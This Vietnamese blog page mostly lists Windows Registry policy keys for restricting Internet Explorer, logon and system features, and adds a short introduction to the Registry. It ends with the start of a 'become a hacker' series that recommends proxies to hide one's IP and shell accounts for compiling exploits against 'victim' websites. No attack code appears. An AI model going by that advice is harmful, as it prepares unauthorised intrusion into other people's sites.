NoHelpItemSendFeedback - Remove the ``Send Feedback`` menu item
NoHelpItemTipOfTheDay - Remove the ``Tip of the Day`` menu item
NoHelpItemTutorial - Remove the ``Tour`` (Tutorial) menu item

User Key: HKEY_CURRENT_USER\ Software\ Policies\ Microsoft\ Internet Explorer\
Restrictions
System Key: HKEY_LOCAL_MACHINE\ Software\ Policies\ Microsoft\ Internet Explorer\
Restrictions
Type: REG_DWORD (DWORD Value)
Value: (0 = restriction disabled, 1 = restriction enabled)

Không cho phép tải file từ Internet về:
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\
Internet Settings\ Zones\ 3
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\
Internet Settings\ Zones\ 3
Name: 1803
Type: REG_DWORD (DWORD Value)
Value: (0 = downloads enabled, 3 = downloads disabled)

Không cho phép truy file từ một đường dẫn Internet.

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
Name: NoFileUrl
Type: REG_DWORD (DWORD Value)
Value: (0 = Enable File URLs, 1 = Disable)

Ẩn một số nút trong Internet Explorer:

NoBrowserClose - Disable the option of closing Internet Explorer.
NoBrowserContextMenu - Disable right-click context menu.
NoBrowserOptions - Disable the Tools / Internet Options menu.
NoBrowserSaveAs - Disable the ability to Save As.
NoFavorites - Disable the Favorites.
NoFileNew - Disable the File / New command.
NoFileOpen - Disable the File / Open command.
NoFindFiles - Disable the Find Files command.
NoSelectDownloadDir - Disable the option of selecting a download directory.
NoTheaterMode - Disable the Full Screen view option.
NoAddressBar - Disable the address bar.
NoToolBar - Disable the tool bar.
NoToolbarOptions - Disable the ability to change toolbar selection.
NoLinksBar - Disable the links bar.
NoViewSource - Disable the ability to view the page source HTML.
NoNavButtons - Disables the Forward and Back navigation buttons
NoPrinting - Remove Print and Print Preview from the File menu.
NoBrowserBars - Disable changes to browsers bars.
AlwaysPromptWhenDownload - Always prompt user when downloading files.
User Key: HKEY_CURRENT_USER\ Software\ Policies\ Microsoft\ Internet Explorer\
Restrictions
System Key: HKEY_LOCAL_MACHINE\ Software\ Policies\ Microsoft\ Internet Explorer\
Restrictions
Type: REG_DWORD (DWORD Value)
Value: (0 = disable restriction, 1 = enable restriction)

Dấu một số tính năng trong Internet Options trong Control Panel

Advanced - Prevent changes to advanced settings
Autoconfig - Prevent changes to Automatic Configuration
Cache - Prevent changes to temporary file settings
CalendarContact - Prevent changes to calender and contacts
Certificates - Prevent changes to security certificates
Check_If_Default - Prevent changes to default browser check
Colors - Prevent Color changes
Connection Settings - Prevent changes to connection settings
Connection Wizard - Disable the Connection Wizard
Fonts - Disable font changes
History - Disable changes to History settings
HomePage - Disable changes to Home Page settings
Languages - Disable Language changes
Links - Disable Links changes
Messaging - Disable Messaging changes
Profiles - Disable changes to Profiles
Proxy - Disable changes to Proxy settings
Ratings - Disable Ratings changes
Wallet - Disable changes to Wallet settings
User Key: HKEY_CURRENT_USER\ Software\ Policies\ Microsoft\ Internet Explorer\
Control Panel
System Key: HKEY_LOCAL_MACHINE\ Software\ Policies\ Microsoft\ Internet Explorer\
Control Panel
Type: REG_DWORD (DWORD Value)
Value: (0 = disable restriction, 1 = enable restriction)

Dấu một số tính năng trong Internet Options trong Control Panel

Accessibility - disables all options under Accessibility
GeneralTab - removes General tab
SecurityTab - removes Security tab
ContentTab - removes Content tab
ConnectionsTab - removes Connections tab
ProgramsTab - removes Programs tab
PrivacyTab - removes Privacy tab
AdvancedTab - removes Advanced tab
CertifPers - prevents changing Personal Certificate options
CertifSite - prevents changing Site Certificate options
CertifSPub - prevents changing Publisher Certificate options
SecChangeSettings - prevents changing Security Levels for the Internet Zone
SecAddSites - prevents adding Sites to any zone
Privacy Settings - prevents changs to privacy settings
FormSuggest - disables AutoComplete for forms
FormSuggest Passwords - prevents Prompt me to save password from being displayed
Connwiz Admin Lock - disables the Internet Connection Wizard
Settings - prevents any changes to Temporary Internet Files
ResetWebSettings - disables the Reset web Setting button
User Key: HKEY_CURRENT_USER\ Software\ Policies\ Microsoft\ Internet Explorer\
Control Panel
System Key: HKEY_LOCAL_MACHINE\ Software\ Policies\ Microsoft\ Internet Explorer\
Control Panel
Type: REG_DWORD (DWORD Value)
Value: (0 = disable restriction, 1 = enable restriction)

Xoá những địa chỉ web bạn đã vào. Vào Registry tìm đến khoá bên dưới, xoá các nhánh con bên cửa sổ bên phải, trừ Default
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Internet Explorer\ TypedURLs

Không cho cài chương trình từ một website nào đó. Bạn tạo một khoá mới với đường dẫn bên dưới. HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Internet Settings\ ZoneMap\ Domains\ restricted.com

Under the sub-key create a new DWORD value called ``*`` and set it to equal ``4``

System Key: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\
Internet Settings\ ZoneMap\ Domains
Name: *
Type: REG_DWORD (DWORD Value)
Value: (4 = restricted)

Điều khiển chế độ thông báo lỗi.

System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Internet Explorer\ Main
Name: IEWatsonDisabled, IEWatsonEnabled
Type: REG_DWORD (DWORD Value)
Logon & Authentication


Không cho Screensaver chạy trong khi Logon:

Khi chưa Logon vào hệ thống, nếu để máy ở trạng thái `không chịu đưa chìa vào mở khoá cửa` quá lâu thì Screensaver sẽ chạy. Ta có thể tắt chúng.

User Key: HKEY_USERS\ .DEFAULT\ Control Panel\ Desktop
Name: ScreenSaveActive
Type: REG_SZ (String Value)
Value: (0 = disabled, 1 = enabled)

Hiển thị nút Shutdown trên hộp thoại Dialog:

Rất cần để những kẻ tò mò mở máy bạn lên mà không vào được sẽ nhấn nút Shutdown ngay trước mặt thay vì rút nguồn nguy hại đến máy.

System Key: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
Name: ShutdownWithoutLogon
Type: REG_SZ (String Value)
Value: (0 = disabled, 1 = enabled)

Cho phép tự động Logon:

Cho phép người dùng sử dụng chế độ tự động đăng nhập vào hệ thống sau khi khởi động.

System Key: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
Name: ForceAutoLogon
Type: REG_SZ (String Value)
Value: (0 = disabled, 1 = enabled)

Tắt chế độ lưu mật khẩu:

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Network
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Network
Name: DisablePwdCaching
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1= enabled)

Bắt buộc mật khẩu là các chữ a-z và số. Không cho phép các ký tự khác:

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Network
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Network.
Name: AlphanumPwds
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1= enabled)

Ẩn nút Change Password.

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System.
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System.
Name: DisableChangePassword
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Tắt chế độ khoá nút WorkStation:
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
System
Name: DisableLockWorkstation
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Tắt chế độ nhấn và giữ phím Shift để không cho chạy một số chương trình tự động khi logon:

System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
Name: IgnoreShiftOverride
Type: REG_SZ (String Value)
Value: (1 = Ignore Shift)

Yêu cầu người dùng phải nhấn tổ hợp phím Ctrl + Alt + Del trước khi đăng nhập vào hệ thống:

System Key: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon.
Name: DisableCAD
Type: REG_DWORD (DWORD Value)
Value: (0 = Require Ctrl+Alt+Delete, 1 = Disable)

Thay đổi dòng thông báo trên hộp thoại Logon và hộp thoại Security:

System Key: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
Name: Welcome
Type: REG_SZ (String Value)
Value: Text to display - nội dung muốn hiển thị

Không cho phép hiện tên người dùng cuối cùng:

User Key: HKEY_CURRENT_USER\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Policies\ System
System Key: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Policies\ System
Name: DontDisplayLastUserName
Type: REG_DWORD (DWORD Value)
Value: (1 = remove username)

Hạn chế số người dùng tự động đăp nhập vào hệ thống:

System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
Name: AutoLogonCount
Type: REG_DWORD (DWORD Value)
Value: Number of Automatic Logins

Chỉ định số người đăng nhập vào hệ thống được lưu vết:

System Key: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon Name: CachedLogonsCount
Type: REG_SZ (String Value)
Value: 0 - 50 (0 = disabled, 10 = default)

Cho phép bung hộp thoại đòi nhập Password khi UnLock máy và thoát khỏi Screen Saver:

System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
Name: ForceUnlockLogon
Type: REG_DWORD (DWORD Value)
Value: 0 = default authentication, 1 = online authentication

Hiển thị hộp thông báo trước khi Logon:

Windows 95, 98 and Me:HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Winlogon
Windows NT, 2000 and XP:HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

Name: LegalNoticeCaption, LegalNoticeText
Type: REG_SZ (String Value)
- LegalNoticeCation: Thanh tiêu đề.
- LegalNoticeText: Nội dung của thông báo.

Hiển thị dòng thông báo trong cửa sổ đăng nhập:

System Key: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
Name: LogonPrompt - nội dung thông báo, lời chào,.....
Type: REG_SZ (String Value)

Cho phép không xây dựng Protables trước khi đăng nhập vào hệ thống:

User Key: HKEY_CURRENT_USER\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Policies\
System
System Key: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Policies\ System
Name: UndockWithoutLogon
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Tự động Logon vào hệ thống:

Tạo một dòng mới `DefaultUserName` và set username mà bạn muốn tự động Logon

Tạo một dòng mới `DefaultPassword` và set password của username đã nhập vào ở trên

Tạo một dòng mới `DefaultDomainName` và set domain cho user. Ignore this value if the NT box is not participating in NT Domain security.

Tạo một dòng mới `DefaultDomainName` và set domain cho user. Ignore this value if the NT box is not participating in NT Domain security.

Tạo một dòng mới có giá trị là `AutoAdminLogon` and set `1` to enable auto logon or `0` to disable it.

For Windows 2000 the additional ForceAutoLogon setting must be enabled to stop the tweak from resetting on reboot.

System Key: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon Name: AutoAdminLogon
Type: REG_SZ (String Value)
Value: (0=disable, 1=enable)

Chỉ định chiều dài tối thiểu của mật khẩu:

User Key: HKEY_CURRENT_USER\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Policies\
Network
System Key: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Policies\
Network
Name: MinPwdLen
Type: REG_BINARY (Binary Value)

MAIN BOARD - CPU

Hiển thị thông tin về BIOS:

Key: HKEY_LOCAL_MACHINE\ HARDWARE\ DESCRIPTION\ System
Name: SystemBiosDate, SystemBiosVersion, VideoBiosDate
Type: REG_SZ (String Value)

Hiển thị thông tin về CPU:


Key: HKEY_LOCAL_MACHINE\ HARDWARE\ DESCRIPTION\ System\ CentralProcessor\ 0
Name: ~MHz, Identifier, VendorIdentifier

Security

Ẩn biểu tượng My Computer trên Start Menu và Desktop:
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
NonEnum
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ NonEnum
Name: {20D04FE0-3AEA-1069-A2D8-08002B30309D}
Type: REG_DWORD (DWORD Value)
Value: (0 = show, 1 = hide)

Ẩn các ổ đĩa trong My Computers:

Chúng ta có thể ẩn các ổ đĩa từ A đến Z, kể cả các ổ mạng. 0 là hiện tất cả. 1 là ẩn.Bạn muốn ẩn ổ nào thì cộng các số thập phân này lại. Ví dụ muốn ẩn ổ A và C thì cho giá trị của khoá NoDrives là 5 = 4(ổ C) + 1(ổ A).

A: 1, B: 2, C: 4, D: 8, E: 16, F: 32, G: 64, H: 128, I: 256, J: 512, K: 1024, L: 2048, M: 4096, N: 8192, O: 16384, P: 32768, Q: 65536, R: 131072, S: 262144, T: 524288, U: 1048576, V: 2097152, W: 4194304, X: 8388608, Y: 16777216, Z: 33554432, ALL: 67108863

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
Name: NoDrives
Type: REG_DWORD (DWORD Value)

Tắt cửa sổ Task Manager:
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
System
Name: DisableTaskMgr
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = disable Task Manager)

Hạn chế một số thay đổi các thư mục riêng của người dùng:
· DisablePersonalDirChange - Hạn chế thay đổi thư mục My Documents.

· DisableMyPicturesDirChange - Hạn chế thay đổi thư mục My Pictures.

· DisableMyMusicDirChange - Hạn chế thay đổi thư mục My Music

· DisableFavoritesDirChange - Hạn chế thay đổi thư mục Favorites

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer.
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer.
Name: DisablePersonalDirChange, DisableMyPicturesDirChange, DisableMyMusicDirChange, DisableFavoritesDirChange.
Type: REG_DWORD (DWORD Value)
Value: (0 = allow changes, 1 = restrict changes)

Tắt chế độ theo dõi người dùng:

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
Name: NoInstrumentation
Type: REG_DWORD (DWORD Value)
Value: (1 = enable restriction)

Không cho phép dùng công cụ Registry Editor để chỉnh sửa Registry:

User Key: HKEY_CURRENT_USER\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Policies\
System
System Key: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Policies\
System
Name: DisableRegistryTools
Type: REG_DWORD (DWORD Value)
Value: (0 = allow regedit, 1 = disable regedit)

Tắt lệnh Shut Down:

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
Name: NoClose
Type: REG_DWORD (DWORD Value)
Value: (0 = shutdown enabled, 1 = shutdown disabled)

Ngăn cản truy cập thành phần cập nhật Windows.
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
Name: NoWindowsUpdate
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = disabled)

Không cho phép dùng phím Windows:

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
Name: NoWinKeys
Type: REG_DWORD (DWORD Value)
Value: (0 = disable restriction, 1 = enable restriction)

Xoá Page File khi tắt máy:

System Key: HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control\ Session Manager\
Memory Management
Name: ClearPageFileAtShutdown
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Tắt các lệnh Run đã chỉ định trong Registry:

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
Name: DisableLocalMachineRun, DisableLocalMachineRunOnce, DisableCurrentUserRun, DisableCurrentUserRunOnce
Type: REG_DWORD (DWORD Value)
Value: (0 = enable run, 1 = disable run)

Hạn chế một số ứng dụng mà các người dùng có thể chạy:

Tạo các khoá mới tên là 1, 2, 3, ...... với kiểu REG_SZ và nhập đường dẫn vào cho giá trị các khoá đó để chỉ định các chương trình không cho phép người dùng chạy.

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\
Explorer
Name: DisallowRun

Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

Tìm hiểu về Windows Registry - Phần I

1. Giới thiệu về Registry:

Registry là một cơ sở dữ liệu dùng để lưu trữ thông số kỹ thuật của Windows. Nó ghi nhận tất cả các thông tin khi bạn thay đổi, chỉnh sửa trong Menu Settings, Control Panel....

2. Registry để ở đâu:
Trong Win95 & 98, Registry được ghi trong 2 file: user.dat và system.dat trong thư mục Windows. Trong Windows Me, Registry được lưu trong file Classes.dat trong thư mục Windows. Trong Win2K Registry được lưu trong thư mục ``Windows\System32\Config``.

3 Registry có thể chỉnh sửa được không?
Registry có thể chỉnh sửa trực tiếp, làm thay đổi các thông số thông qua trình chỉnh sữa Registry Editor. Chạy Registry Editor bằng cách gõ regedit vào cửa sổ Run.

4 Cấu trúc của Registry:

Registry có cấu trúc cây, giống cấu trúc thư mục. Thông thường có sáu nhánh chính. Mỗi nhánh được giao hiệm vụ lưu giữ những thông tin riêng biệt. Trong các nhánh chính có rất nhiều nhánh con. Những nhánh con này cũng được lưu giữ nhưng thông tin riêng biệt.
HKEY_CLASSES_ROOT: Lưu những thông tin dùng chung cho toàn bộ hệ thống.

HKEY_CURRENT_USER: Lưu những thông tin cho người dùng đang Logon

HKEY_LOCAL_MACHINE: Lưu những thông tin về hệ thống, phần cứng, phần mềm.

HKEY_USERS: Lưu những thông tin của tất cả các User, mỗi user là một nhánh với tên là số ID của user đó

HKEY_CURRENT_CONFIG: Lưu thông tin về phần cứng hiện tại đang dùng.

HKEY_DYN_DATA: Đây cũng là một phần của nhánh HKEY_LOCAL_MACHINE

5. Các kiểu dữ liệu dùng trong Registry:
-REG_BINARY: Kiểu nhị phân
-REG_DWORD: Kiểu Double Word
-REG_EXPAND_SZ: Kiểu chuỗi mở rộng đặc biệt. VD: ``%SystemRoot%``
-REG_MULTI_SZ: Kiểu chuỗi đặc biệt
-REG_SZ: Kiểu chuỗi chuẩn

6. Tại sao cần phải biết về Registry?

- Registry lưu tất cả các thông tin về phần cứng, phần mềm, những lựa chọn của người dùng....kiểm soát được nội dung của Registry là yêu cầu tất yếu để bạn sử dụng PC một cách khoa học, hiểu sâu hơn về môi trường làm vịệc của Windows.
- Muốn tiến xa hơn trong kỹ thuật lập trình trên nền Windows, cách bảo mật, cracking, hacking bạn cần phải có hiểu biết nhất định về Registry.
- Hầu hết các thủ thuật trong Windows mà các tạp chí tin học tên tuổi của Việt Nam đã và sẽ đăng có liên quan mật thiết đến Windows Registry.

7. Cảnh báo!

Khi sử dụng Registry Editor bạn phải tiến hành sao lưu Registry. Mọi thay đổi có thể làm máy của bạn không khởi động, treo máy, ..... . Sao lưu bằng cách chạy Registry Editor : File - Export ...... và lưu vào chổ an toàn.

Nếu chưa có kiến thức về Windows Registry xin bạn đọc một chút các dòng hướng dẫn bên dưới.

- Dòng sau các từ: User Key, Sytem Key, hoặc Key cho biết đường dẫn đến nhánh cần sữa chữa hoặc tạo mới nếu nó không tồn tại.
Lưu ý: User Key: là để thay đổi đó có tác dụng với người đang Logon. System Key: là để thay đổi đó có tác dụng với tất cả người dùng.
-Dòng Name là tên của khoá cần tạo, nó là nhánh con bên cửa sổ bên phải của Registry
-Dòng Type là kiểu dữ liệu của khoá mới tạo
-Dòng : Value là giá trị của khoá

ACTIVE DESKTOP

Cho phép chế độ Desktop hoạt động hay không:
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer
Name: ForceActiveDesktopOn
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = enabled)


Một số ngăn cản khi cho phép chế độ Desktop hoạt động.
NoChangingWallpaper - Không cho phép thay đổi hình Wallpaper.
NoComponents - Không cho phép hiển thị các thành phần.
NoAddingComponents - Không cho phép thêm các thành phần mới.
NoDeletingComponents - Không cho phép xoá các thành phần.
NoEditingComponents - Không cho phép sữa các thành phần.
NoCloseDragDropBands - Không cho phép chức năng dùng chuột kéo thả trên Desktop.
NoMovingBands - Không cho phép chức năng kéo thả các Taskbar đi nơi khác trên Desktop.
NoHTMLWallPaper - Chỉ cho phép hình dạng bitmaps (BMP).


User Key:HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ ActiveDesktop.
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ ActiveDesktop.
Type: REG_DWORD (DWORD Value)
Value: (0 = disable restriction, 1 = enable restriction)

Ẩn chức năng Active Desktop từ Menu Settings trên Start Menu.

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer.
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer.
Name: NoSetActiveDesktop
Type: REG_DWORD (DWORD Value)
Value: (0 = disable restriction, 1 = enable restriction)

Không cho thay đổi chế độ Active Destop.
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer
Name: NoActiveDesktopChanges
Type: REG_DWORD (DWORD Value)
Value: (0 = disable restriction, 1 = enable restriction)

CONTROL PANEL

Không cho phép thay đổi kiểu dáng của các Controls.

Phần này sẽ hạn chế một phần hoặc tất cả các chức năng trong mục (Tab) Appearance trong Display. Gán giá trị 0: để hiện, 1 để ẩn với các tên khoá đưa ra phía bên dưới.

NoVisualStyleChoice - không cho phép thay đổi kiểu dáng của các cửa sổ và út nhấn.
NoColorChoice - Không cho phép thay đổi sơ đồ màu.
NoSizeChoice - Không cho phép thay đổi cỡ chữ.

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System.

Name: NoColorChoice, NoSizeChoice, NoVisualStyleChoice, SetVisualStyle.

Tắt chế độ Themes Settings trong Display trong Control Panel:

Themes Settings để thay đổi kiểu dáng của các cửa sổ các nút nhấn. Nếu không thích sài thì cất chúng đi bằng cách tạo một khoá mới với tên `NoThemesTab` và gán giá trị cho nó là 1.
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer.
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer.
Name: NoThemesTab
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = enable restriction)

Tắt chế độ thay đổi Keyboard Navigation Settings trong Control Panel:
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer.
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer.
Name: NoChangeKeyboardNavigationIndicators
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = enable restriction)

Ngăn cản tính năng trình diễn hoạt hình Animation Settings.
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer.
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer.
Name: NoChangeAnimation
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = enable restriction)

Điều khiển chế độ hoạt hình :

User Key: HKEY_CURRENT_USER\ Control Panel\ Desktop\ WindowMetrics
Name: MinAnimate
Type: REG_SZ (String Value)
Value: (0=disable, 1=enable)

Tắt Settings của Display trong Control Panel:

Điều này cũng có nghĩa là bạn không thể thay đổi được độ phân giản của màn hình mục Settings không được phép hoạt động.
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System.
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System.
Name: NoDispSettingsPage
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Tắt mục ScreenSaver của Display trong Control Panel:

Khi tắt mục ScreenSaver không có nghĩa là tắt chế độ ScreenSaver tự chạy, mà là ẩn không cho thay đổi, chỉnh sữa ScreenSaver. Vì vậy trước khi tắt nó đi bạn phải cân nhắc.
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System.
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System.
Name: NoDispScrSavPage
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Tắt mục thay đổi hình nền của Display trong Control Panel:

Không cho thay đổi hình nền, màu nền của Desktop.
User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System.
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System.
Name: NoDispBackgroundPage
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Tắt mục Appearance của Display trong Control Panel.

User Key: HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System.
System Key: HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System.
Name: NoDispAppearancePage
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)
Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

Thứ Sáu, 9 tháng 10, 2009

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 8

Hacker08


47 . ) Các công cụ cần thiết để hack Web :
_ Đối với các hacker chuyên nghiệp thì họ sẽ không cần sử dụng những công cụ này mà họ sẽ trực tiếp setup phiên bản mà trang Web nạn nhân sử dụng trên máy của mình để test lỗi . Nhưng đối với các bạn mới “vào nghề” thì những công cụ này rất cần thiết , hãy sử dụng chúng một vài lần bạn sẽ biết cách phối hợp chúng để việc tìm ra lỗi trên các trang Web nạn nhân được nhanh chóng nhất . Sau đây là một số công cụ bạn cần phải có trên máy “làm ăn” của mình :

_ Công cụ thứ 1 : Một cái proxy dùng để che dấu IP và vượt tường lửa khi cần ( Cách tạo 1 cái Proxy tôi đã bày ở phần 7 , các bạn hãy xem lại nhé ) .
_ Công cụ thứ 2 : Bạn cần có 1 shell account, cái này thực sự quan trọng đối với bạn . Một shell account tốt là 1 shell account cho phép bạn chạy các chương trình chính như nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,...và shell account đó cần phải cài chương trình GCC ( rất quan trọng trong việc dịch (compile) các exploit được viết bằng C) như MinGW, Cygwin và các dev tools khác.
Shell account gần giống với DOS shell,nhưng nó có nhiều câu lệnh và chức năng hơn DOS . Thông thường khi bạn cài Unix thì bạn sẽ có 1 shell account, nếu bạn không cài Unix thì bạn nên đăng ký trên mạng 1 shell account free hoặc nếu có ai đó cài Unix và thiết lập cho bạn 1 shell account thì bạn có thể log vào telnet (Start -- > Run -- > gõ Telnet) để dùng shell account đó. Sau đây là 1 số địa chỉ bạn có thể đăng ký free shell account :
http://www.freedomshell.com/
http://www.cyberspace.org/shell.ht ml
http://www.ultrashell.net/
